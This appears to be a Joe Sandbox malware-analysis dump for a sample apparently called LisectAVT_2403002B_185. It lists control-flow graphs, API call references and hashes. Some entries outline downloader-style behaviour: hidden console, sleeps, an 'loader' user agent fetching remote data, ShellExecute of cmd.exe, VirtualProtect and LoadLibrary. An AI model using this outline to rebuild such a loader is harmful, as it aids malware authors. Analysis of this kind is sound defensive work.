                                                                  control_flow_graph 157 495749-495779 call 495497 160 49577b-495786 call 481ff6 157->160 161 495794-4957a0 call 48ffc3 157->161 168 495788-49578f call 482009 160->168 166 4957b9-495802 call 495402 161->166 167 4957a2-4957b7 call 481ff6 call 482009 161->167 177 49586f-495878 GetFileType 166->177 178 495804-49580d 166->178 167->168 175 495a6e-495a72 168->175 179 49587a-4958ab GetLastError call 481fae CloseHandle 177->179 180 4958c1-4958c4 177->180 182 49580f-495813 178->182 183 495844-49586a GetLastError call 481fae 178->183 179->168 196 4958b1-4958bc call 482009 179->196 186 4958cd-4958d3 180->186 187 4958c6-4958cb 180->187 182->183 188 495815-495842 call 495402 182->188 183->168 191 4958d7-495925 call 48ff0e 186->191 192 4958d5 186->192 187->191 188->177 188->183 199 495944-49596c call 4951ac 191->199 200 495927-495933 call 495611 191->200 192->191 196->168 207 49596e-49596f 199->207 208 495971-4959b2 199->208 200->199 206 495935 200->206 209 495937-49593f call 48769f 206->209 207->209 210 4959d3-4959e1 208->210 211 4959b4-4959b8 208->211 209->175 212 495a6c 210->212 213 4959e7-4959eb 210->213 211->210 215 4959ba-4959ce 211->215 212->175 213->212 216 4959ed-495a20 CloseHandle call 495402 213->216 215->210 220 495a22-495a4e GetLastError call 481fae call 4900d6 216->220 221 495a54-495a68 216->221 220->221 221->212
                                                                  APIs
                                                                    • Part of subcall function 00495402: CreateFileW.KERNEL32(?,00000000,?,004957F2,?,?,00000000,?,004957F2,?,0000000C), ref: 0049541F
                                                                  • GetLastError.KERNEL32 ref: 0049585D
                                                                  • __dosmaperr.LIBCMT ref: 00495864
                                                                  • GetFileType.KERNEL32(00000000), ref: 00495870
                                                                  • GetLastError.KERNEL32 ref: 0049587A
                                                                  • __dosmaperr.LIBCMT ref: 00495883
                                                                  • CloseHandle.KERNEL32(00000000), ref: 004958A3
                                                                  • CloseHandle.KERNEL32(0048BAD5), ref: 004959F0
                                                                  • GetLastError.KERNEL32 ref: 00495A22
                                                                  • __dosmaperr.LIBCMT ref: 00495A29
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                  • String ID: H
                                                                  • API String ID: 4237864984-2852464175
                                                                  • Opcode ID: 9e9df148187f613c091dbe05553887a6b5362343331954f9efbc68e46e35996b
                                                                  • Instruction ID: 867165669c86b53efa4dcc5f55d1fc009283e7ea79a0175da6507dbb1835aa2d
                                                                  • Opcode Fuzzy Hash: 9e9df148187f613c091dbe05553887a6b5362343331954f9efbc68e46e35996b
                                                                  • Instruction Fuzzy Hash: D9A13772A145149FCF1AAF68DC91BAE3FA1AB06324F24016FF9019F391D7398D12CB59

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • InternetOpenA.WININET(Mozilla/5.0,00000001,00000000,00000000,00000000), ref: 00472CDB
                                                                    • Part of subcall function 00472B40: task.LIBCPMTD ref: 00472C92
                                                                  • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,80000000,00000000), ref: 00472D19
                                                                  • task.LIBCPMTD ref: 00472D25
                                                                  • task.LIBCPMTD ref: 00472D70
                                                                  • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00472DAC
                                                                  • InternetCloseHandle.WININET(00000000), ref: 00472DE6
                                                                  • InternetCloseHandle.WININET(00000000), ref: 00472E02
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$task$CloseHandleOpen$FileRead
                                                                  • String ID: Mozilla/5.0
                                                                  • API String ID: 3809162015-2630049532
                                                                  • Opcode ID: a6e9fb30afa15e0c86c71b2388d05d96a10fae1adb396c0099b38447ee031a33
                                                                  • Instruction ID: da0eb24f5adabb990110f46935e79b3bf7ded8661cb44994852773f1a74602ce
                                                                  • Opcode Fuzzy Hash: a6e9fb30afa15e0c86c71b2388d05d96a10fae1adb396c0099b38447ee031a33
                                                                  • Instruction Fuzzy Hash: 1A4171B1900209ABDB24DF94CD46BEEB774FB54704F20816EF619762D0DBB86E44CB98

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 255 474520-474548 call 476bb0 call 476c10 260 47455b-474565 call 476210 255->260 261 47454a-474556 call 476bc0 255->261 267 474567-47457b call 476210 call 476190 260->267 268 47459d-4745a4 260->268 266 4746d8-4746dd 261->266 267->268 283 47457d-474598 call 4746e0 call 476040 267->283 269 4745a6-4745ab call 476bb0 268->269 270 4745b0-4745bf call 475bf0 268->270 269->266 278 4745c1-4745d8 call 4746e0 call 472ac0 270->278 279 4745ff-474646 call 4746e0 call 4758e0 270->279 292 4745dd-4745e5 278->292 294 474656-474661 279->294 295 474648-47464c 279->295 283->266 296 4745e7-4745ed 292->296 297 4745ef-4745f4 call 476bb0 292->297 300 474663-47467f call 47eb89 294->300 301 474688-474695 294->301 295->294 299 47464e-474652 295->299 302 4745f7-4745fa 296->302 297->302 306 474654-4746d3 call 476bb0 299->306 307 4746a3-4746bc call 472ac0 299->307 300->301 316 474681-474686 call 476bb0 300->316 304 474697-47469a 301->304 305 47469c-4746a1 call 476bb0 301->305 302->266 304->266 305->266 306->266 318 4746c6-4746cb call 476bb0 307->318 319 4746be-4746c4 307->319 316->266 321 4746ce-4746d1 318->321 319->321 321->266
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: char_traits
                                                                  • String ID:
                                                                  • API String ID: 1158913984-3916222277
                                                                  • Opcode ID: e0141cd5b8471f13d3669d370f0f29927affb7cc6185455ab20bd4ddeca3f86a
                                                                  • Instruction ID: b12e21e708bcb7e0731305cf2574435f82f3e789099f630349775be7e431f908
                                                                  • Opcode Fuzzy Hash: e0141cd5b8471f13d3669d370f0f29927affb7cc6185455ab20bd4ddeca3f86a
                                                                  • Instruction Fuzzy Hash: 40519FB5D00118AFCF04EBA5C4419FEB7B5AF85304F04C09BE509AB241EB3CAA45CFA9

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 324 48abe3-48abf3 325 48ac0d-48ac0f 324->325 326 48abf5-48ac08 call 481ff6 call 482009 324->326 328 48af4f-48af5c call 481ff6 call 482009 325->328 329 48ac15-48ac1b 325->329 340 48af67 326->340 346 48af62 call 48143d 328->346 329->328 332 48ac21-48ac4a 329->332 332->328 335 48ac50-48ac59 332->335 338 48ac5b-48ac6e call 481ff6 call 482009 335->338 339 48ac73-48ac75 335->339 338->346 343 48af4b-48af4d 339->343 344 48ac7b-48ac7f 339->344 345 48af6a-48af6d 340->345 343->345 344->343 348 48ac85-48ac89 344->348 346->340 348->338 349 48ac8b-48aca2 348->349 352 48aca4-48aca7 349->352 353 48acd7-48acdd 349->353 355 48aca9-48acaf 352->355 356 48accd-48acd5 352->356 357 48acdf-48ace6 353->357 358 48acb1-48acc8 call 481ff6 call 482009 call 48143d 353->358 355->356 355->358 360 48ad4a-48ad69 356->360 361 48ace8 357->361 362 48acea-48ad08 call 489045 call 487531 * 2 357->362 389 48ae82 358->389 364 48ad6f-48ad7b 360->364 365 48ae25-48ae2e call 492aa1 360->365 361->362 393 48ad0a-48ad20 call 482009 call 481ff6 362->393 394 48ad25-48ad48 call 48b174 362->394 364->365 370 48ad81-48ad83 364->370 378 48ae9f 365->378 379 48ae30-48ae42 365->379 370->365 371 48ad89-48adaa 370->371 371->365 375 48adac-48adc2 371->375 375->365 380 48adc4-48adc6 375->380 382 48aea3-48aeb9 ReadFile 378->382 379->378 384 48ae44-48ae53 GetConsoleMode 379->384 380->365 385 48adc8-48adeb 380->385 387 48aebb-48aec1 382->387 388 48af17-48af22 GetLastError 382->388 384->378 390 48ae55-48ae59 384->390 385->365 392 48aded-48ae03 385->392 387->388 397 48aec3 387->397 395 48af3b-48af3e 388->395 396 48af24-48af36 call 482009 call 481ff6 388->396 391 48ae85-48ae8f call 487531 389->391 390->382 398 48ae5b-48ae73 ReadConsoleW 390->398 391->345 392->365 400 48ae05-48ae07 392->400 393->389 394->360 407 48ae7b-48ae81 call 481fae 395->407 408 48af44-48af46 395->408 396->389 404 48aec6-48aed8 397->404 405 48ae94-48ae9d 398->405 406 48ae75 GetLastError 398->406 400->365 411 48ae09-48ae20 400->411 404->391 415 48aeda-48aede 404->415 405->404 406->407 407->389 408->391 411->365 419 48aee0-48aef0 call 48a8f5 415->419 420 48aef7-48af04 415->420 429 48aef3-48aef5 419->429 421 48af10-48af15 call 48a73b 420->421 422 48af06 call 48aa4c 420->422 430 48af0b-48af0e 421->430 422->430 429->391 430->429
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2be3a294bfe4285191aee73fdc91b6abd4fb866692cfbd580e203ce39f55796f
                                                                  • Instruction ID: daab2a77ba567d1426cd5d4dd0bae5076d9e238a94f327527bcf5f8e6a7e820a
                                                                  • Opcode Fuzzy Hash: 2be3a294bfe4285191aee73fdc91b6abd4fb866692cfbd580e203ce39f55796f
                                                                  • Instruction Fuzzy Hash: 84B117B0A00209AFEB11FF99D840B7E7BB5AF05314F14495FE6009B391D7B89D52CB6A
                                                                  APIs
                                                                    • Part of subcall function 034C98D2: LoadLibraryA.KERNEL32(00000000,?,?), ref: 034C9964
                                                                  • VirtualProtect.KERNEL32(00000000,0000000C,00000040,?), ref: 034C770F
                                                                  • VirtualProtect.KERNEL32(00000000,0000000C,?,?), ref: 034C7742
                                                                  • VirtualProtect.KERNEL32(00000000,0040145E,00000040,?), ref: 034C7775
                                                                  • VirtualProtect.KERNEL32(00000000,0040145E,?,?), ref: 034C779F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1680288880.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_34c0000_LisectAVT_2403002B_185.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: ProtectVirtual$LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 895956442-0
                                                                  • Opcode ID: 5abde9ea6318855c5243acd77b08285013fe7b3e318e0c860c6c3d549a2b56cb
                                                                  • Instruction ID: b38202f460d5ec7af464c44fb27248149776d2744ac15cd07919939736424eab
                                                                  • Opcode Fuzzy Hash: 5abde9ea6318855c5243acd77b08285013fe7b3e318e0c860c6c3d549a2b56cb
                                                                  • Instruction Fuzzy Hash: A521E57E2243897FE350EA618C44FB77A9CDB84310F04043FFA46DA151EB69B9058BB9

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetConsoleWindow.KERNEL32 ref: 004735A4
                                                                  • ShowWindow.USER32(?,00000000), ref: 004735B3
                                                                  • Sleep.KERNEL32(00000BB8), ref: 004735C3
                                                                    • Part of subcall function 00473240: Sleep.KERNEL32(00000BB8,?,00498613,000000FF), ref: 0047326C
                                                                    • Part of subcall function 00473240: InternetOpenA.WININET(loader,00000001,00000000,00000000,00000000), ref: 0047328D
                                                                    • Part of subcall function 00473240: InternetOpenUrlA.WININET(00000000,\GJ,00000000,00000000,80000000,00000000), ref: 004732CD
                                                                    • Part of subcall function 00473240: InternetCloseHandle.WININET(?), ref: 004732FE
                                                                    • Part of subcall function 00473240: InternetCloseHandle.WININET(?), ref: 00473361
                                                                    • Part of subcall function 00473240: InternetCloseHandle.WININET(?), ref: 0047336B
                                                                    • Part of subcall function 00473240: InternetReadFile.WININET(00000000,?,00001000,?), ref: 0047338C
                                                                  • Sleep.KERNEL32(00000BB8), ref: 004735D3
                                                                    • Part of subcall function 00472F40: GetCurrentProcess.KERNEL32(00000100), ref: 00472F4E
                                                                    • Part of subcall function 00472F40: SetPriorityClass.KERNEL32(00000000), ref: 00472F55
                                                                    • Part of subcall function 00472F40: GetCurrentThread.KERNEL32 ref: 00472F5D
                                                                    • Part of subcall function 00472F40: SetThreadPriority.KERNEL32(00000000), ref: 00472F64
                                                                    • Part of subcall function 00472F40: SHChangeNotify.SHELL32(00000004,00000001,?,00000000), ref: 00472F78
                                                                    • Part of subcall function 00472F40: _fwprintf.LIBCONCRTD ref: 00472F92
                                                                    • Part of subcall function 00472F40: ShellExecuteA.SHELL32(00000000,open,cmd.exe,?,00000000,00000000), ref: 00472FB1
                                                                    • Part of subcall function 00472F40: ExitProcess.KERNEL32 ref: 00472FB9
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$CloseHandleSleep$CurrentOpenPriorityProcessThreadWindow$ChangeClassConsoleExecuteExitFileNotifyReadShellShow_fwprintf
                                                                  • String ID:
                                                                  • API String ID: 96696892-0
                                                                  • Opcode ID: 34db8098535bf333fffd3f6ee1ced14763e0a5ec363c1deef6e8dd4d4f0e06f7
                                                                  • Instruction ID: 9ce906a7e80e9da286566bc5a5eca5ff4759a923688ac76a5f16249f8cf5631d
                                                                  • Opcode Fuzzy Hash: 34db8098535bf333fffd3f6ee1ced14763e0a5ec363c1deef6e8dd4d4f0e06f7
                                                                  • Instruction Fuzzy Hash: 1AE08630500208ABD350BFBADE0BA5D76A8DB08706F0040BFB605911A1CEB55D00965D
                                                                  APIs
                                                                  • LoadLibraryA.KERNEL32(00000000,?,?), ref: 034C9964
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000003.1680288880.00000000034C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_3_34c0000_LisectAVT_2403002B_185.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID: .$.dll
                                                                  • API String ID: 1029625771-979041800
                                                                  • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                  • Instruction ID: 488403b5baf3f30e723eef251697b18844248818a49ca4ae765f93a57cc6f1f9
                                                                  • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                  • Instruction Fuzzy Hash: 8221D5396203C5AFDB91CF6CC844A6ABBA8AF05320F0841AED8559FB41D720E845CB54

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 439 477990-4779e7 call 476c60 call 472810 444 477a37-477a3a 439->444 445 4779e9 439->445 446 477a3f-477a6b call 475750 call 4756c0 444->446 447 4779f1-477a0d call 472810 445->447 448 4779eb-4779ef 445->448 459 477a6d-477a76 446->459 460 477a7b-477a9f call 4727f0 446->460 447->444 454 477a0f 447->454 448->444 448->447 456 477a11-477a17 454->456 457 477a19-477a35 call 472810 454->457 456->444 456->457 457->446 462 477c5f-477c9d call 476400 call 4756e0 459->462 467 477b36-477b3a 460->467 468 477aa5 460->468 469 477b84-477b88 467->469 470 477b3c-477b60 call 4763e0 call 476270 467->470 472 477ab9-477abd 468->472 476 477b8e 469->476 477 477c1b-477c56 call 472830 469->477 488 477b65-477b71 470->488 472->467 473 477abf 472->473 478 477ac7-477b24 call 478760 call 4763e0 call 4785c0 call 476bb0 call 476c10 473->478 479 477ac1-477ac5 473->479 481 477ba2-477ba6 476->481 477->462 511 477b26-477b2f 478->511 512 477b31 478->512 479->467 479->478 481->477 485 477ba8 481->485 489 477bb0-477c09 call 478760 call 4763e0 call 4785c0 call 476bb0 call 476c10 485->489 490 477baa-477bae 485->490 493 477b73-477b79 488->493 494 477b7b-477b81 488->494 515 477c16 489->515 516 477c0b-477c14 489->516 490->477 490->489 493->469 493->494 494->469 511->467 512->472 515->481 516->477
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: char_traits
                                                                  • String ID:
                                                                  • API String ID: 1158913984-0
                                                                  • Opcode ID: 33b713202f9f086fad97800618df59f9c4475ab3c0b5535a64eb033da80744d6
                                                                  • Instruction ID: 49604c958a6e2517f99428a75133b939d05c2c0aa65f4901eb633de13ac8e610
                                                                  • Opcode Fuzzy Hash: 33b713202f9f086fad97800618df59f9c4475ab3c0b5535a64eb033da80744d6
                                                                  • Instruction Fuzzy Hash: F0B1E774904208DFDB18DF95C491AEEBBB1FF48308F64C11AE51AAB355C738AA45CF84

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 518 473f50-473f5d 519 473f70-473f77 518->519 520 473f5f 518->520 523 473f92-473fb3 call 4760d0 519->523 524 473f79-473f8d call 474940 519->524 521 473f67-473f6b 520->521 522 473f61-473f65 520->522 525 4740a7-4740aa 521->525 522->519 522->521 530 473fb5-473ffc call 4740b0 call 476230 call 476ca0 call 4761b0 523->530 531 474001-474008 523->531 524->525 530->531 532 47400e-474016 call 475bf0 531->532 533 474098-4740a5 531->533 540 47401d-474024 532->540 533->525 542 474026-474038 call 480d80 540->542 543 474071-474075 540->543 549 47403d-47405c 542->549 543->533 546 474077-474088 call 480d80 543->546 550 47408d-474095 546->550 551 47406f 549->551 552 47405e-47406d 549->552 550->533 551->540 552->525
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: __fread_nolock$Min_value
                                                                  • String ID:
                                                                  • API String ID: 3100174245-0
                                                                  • Opcode ID: 8371f13d69e443bdbdbb54f4938de538dee45e7015f964985af737612c5b5777
                                                                  • Instruction ID: 6db68fcb5eba06d812a71bd3445e450aa0e0188e209a31c284dbe5f7ea585caa
                                                                  • Opcode Fuzzy Hash: 8371f13d69e443bdbdbb54f4938de538dee45e7015f964985af737612c5b5777
                                                                  • Instruction Fuzzy Hash: 9B51F675E00109EFCB08DFA8C884AEEB7B5FF88304F10C56AE919A7341D734AA45DB95

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 553 489fe9-489ff6 554 489ff8-48a01b call 4813c0 553->554 555 48a020-48a034 call 485e72 553->555 560 48a187-48a189 554->560 561 48a039-48a042 call 48b156 555->561 562 48a036 555->562 564 48a047-48a056 561->564 562->561 565 48a058 564->565 566 48a066-48a06f 564->566 567 48a05e-48a060 565->567 568 48a130-48a135 565->568 569 48a071-48a07e 566->569 570 48a083-48a0b7 566->570 567->566 567->568 571 48a185-48a186 568->571 572 48a183 569->572 573 48a0b9-48a0c3 570->573 574 48a114-48a120 570->574 571->560 572->571 577 48a0ea-48a0f6 573->577 578 48a0c5-48a0d1 573->578 575 48a122-48a129 574->575 576 48a137-48a13a 574->576 575->568 580 48a13d-48a145 576->580 577->576 579 48a0f8-48a112 call 48a500 577->579 578->577 581 48a0d3-48a0e5 call 48a355 578->581 579->580 583 48a181 580->583 584 48a147-48a14d 580->584 581->571 583->572 588 48a14f-48a163 call 48a18a 584->588 589 48a165-48a169 584->589 588->571 591 48a16b-48a179 call 497e10 589->591 592 48a17c-48a17e 589->592 591->592 592->583
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: =G
                                                                  • API String ID: 0-1717635089
                                                                  • Opcode ID: d30591c92383c8617fb663e6c5f4da2d46361d0b019db2b8e3dd51f29bac5572
                                                                  • Instruction ID: fb034f62b4d4d77fa1477b71bcbf1ad20efece2f68bc9230a43d2bc54d38d1a8
                                                                  • Opcode Fuzzy Hash: d30591c92383c8617fb663e6c5f4da2d46361d0b019db2b8e3dd51f29bac5572
                                                                  • Instruction Fuzzy Hash: B351F370A00104AFEB14EF58CC85AAE7BA1EB49324F24855BE8085B352D3B99E51CB96

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 596 477d00-477d3f call 471540 599 477d41-477d48 call 478560 596->599 600 477d8f-477da4 call 471520 596->600 603 477d4d-477d8a call 478590 call 4783d0 599->603 603->600
                                                                  APIs
                                                                  • Concurrency::cancellation_token_source::~cancellation_token_source.LIBCPMTD ref: 00477D8A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: Concurrency::cancellation_token_source::~cancellation_token_source
                                                                  • String ID: Z6G
                                                                  • API String ID: 2028376226-4291704626
                                                                  • Opcode ID: 932091a807477c8807c9bff466568d533b3368f7fcf0829cae8487b25b6ceda2
                                                                  • Instruction ID: f96a375e93b5973589c1d703f1974185b8a7c6954886202528753a3745881718
                                                                  • Opcode Fuzzy Hash: 932091a807477c8807c9bff466568d533b3368f7fcf0829cae8487b25b6ceda2
                                                                  • Instruction Fuzzy Hash: B011ECB1D04109EFCB04DF98C595BEEBBB5FB48710F10825EE919A7380DB385A41CBA5

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 608 487315-487337 609 48752a 608->609 610 48733d-48733f 608->610 613 48752c-487530 609->613 611 48736b-48738e 610->611 612 487341-487360 call 4813c0 610->612 615 487390-487392 611->615 616 487394-48739a 611->616 621 487363-487366 612->621 615->616 617 48739c-4873ad 615->617 616->612 616->617 619 4873af-4873bd call 48b1b4 617->619 620 4873c0-4873d0 call 486e5a 617->620 619->620 626 487419-48742b 620->626 627 4873d2-4873d8 620->627 621->613 628 48742d-487433 626->628 629 487482-4874a2 WriteFile 626->629 630 4873da-4873dd 627->630 631 487401-487417 call 486a2b 627->631 632 48746e-48747b call 486ed7 628->632 633 487435-487438 628->633 636 4874ad 629->636 637 4874a4-4874aa GetLastError 629->637 634 4873e8-4873f7 call 486df2 630->634 635 4873df-4873e2 630->635 646 4873fa-4873fc 631->646 653 487480 632->653 641 48745a-48746c call 48709b 633->641 642 48743a-48743d 633->642 634->646 635->634 643 4874c2-4874c5 635->643 640 4874b0-4874bb 636->640 637->636 647 4874bd-4874c0 640->647 648 487525-487528 640->648 658 487455-487458 641->658 649 4874c8-4874ca 642->649 650 487443-487450 call 486fb2 642->650 643->649 646->640 647->643 648->613 654 4874f8-487504 649->654 655 4874cc-4874d1 649->655 650->658 653->658 661 48750e-487520 654->661 662 487506-48750c 654->662 659 4874ea-4874f3 call 481fd1 655->659 660 4874d3-4874e5 655->660 658->646 659->621 660->621 661->621 662->609 662->661
                                                                  APIs
                                                                    • Part of subcall function 00486A2B: GetConsoleOutputCP.KERNEL32(EF8D9AA4,00000000,00000000,?), ref: 00486A8E
                                                                  • WriteFile.KERNEL32(?,00000000,0048112F,?,00000000,00000000,00000000,?,00000000,?,004797B5,0048112F,00000000,004797B5,?,?), ref: 0048749A
                                                                  • GetLastError.KERNEL32(?,0048112F,00000000,?,004797B5,?,00000000,00000000), ref: 004874A4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1711653654.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                  • Associated: 00000000.00000002.1711629921.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711685290.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711711519.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.1711734747.00000000004AA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_470000_LisectAVT_2403002B_185.jbxd
                                                                  Similarity
                                                                  • API ID: ConsoleErrorFileLastOutputWrite
                                                                  • String ID:
